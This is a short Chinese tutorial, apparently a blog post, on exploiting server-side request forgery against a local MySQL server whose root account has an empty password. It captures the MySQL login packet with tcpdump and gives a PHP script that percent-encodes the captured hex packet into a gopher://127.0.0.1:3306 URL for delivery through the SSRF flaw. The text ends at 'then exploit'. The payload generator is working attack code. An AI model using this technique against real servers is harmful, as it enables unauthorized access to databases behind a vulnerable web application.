ssrf+本地MySQL空密码的利用

首先我们要在本地进行利用wireshark抓取一下mysql空密码的数据包。
mysql要使用TCP/IP协议进行连接

1
mysql -h127.0.0.1 -uroot

然后使用tcpdump进行抓取数据包

1
tcpdump –i lo port 3306 –w mysql.pcay

对抓取到的数据包进行查看,使用wireshark查看

查看一条数据,数据查看方式选择TCP流,选择方式如下图

这个数据然后再进行因为是tcp流的,我们需要对其进行每两个字符添加%进行url编码,代码如下:

1
2
3
4
5
6
7
8
9
<?php
$url = "a800000185a6ff0100000001210000000000000000000000000000000000000000000000757365726e6f7061737300006d7973716c5f6e61746976655f70617373776f72640065035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c045f70696404333630390f5f636c69656e745f76657273696f6e06352e372e3231095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420310100000001";
for($i=0;$i<=strlen($url);$i=$i+3)
{
$url = substr_replace($url,'%',$i,0);
}
$url_gopher = "gopher://127.0.0.1:3306/_" . $url;
echo $url_gopher . "\r\n";
?>

然后进行利用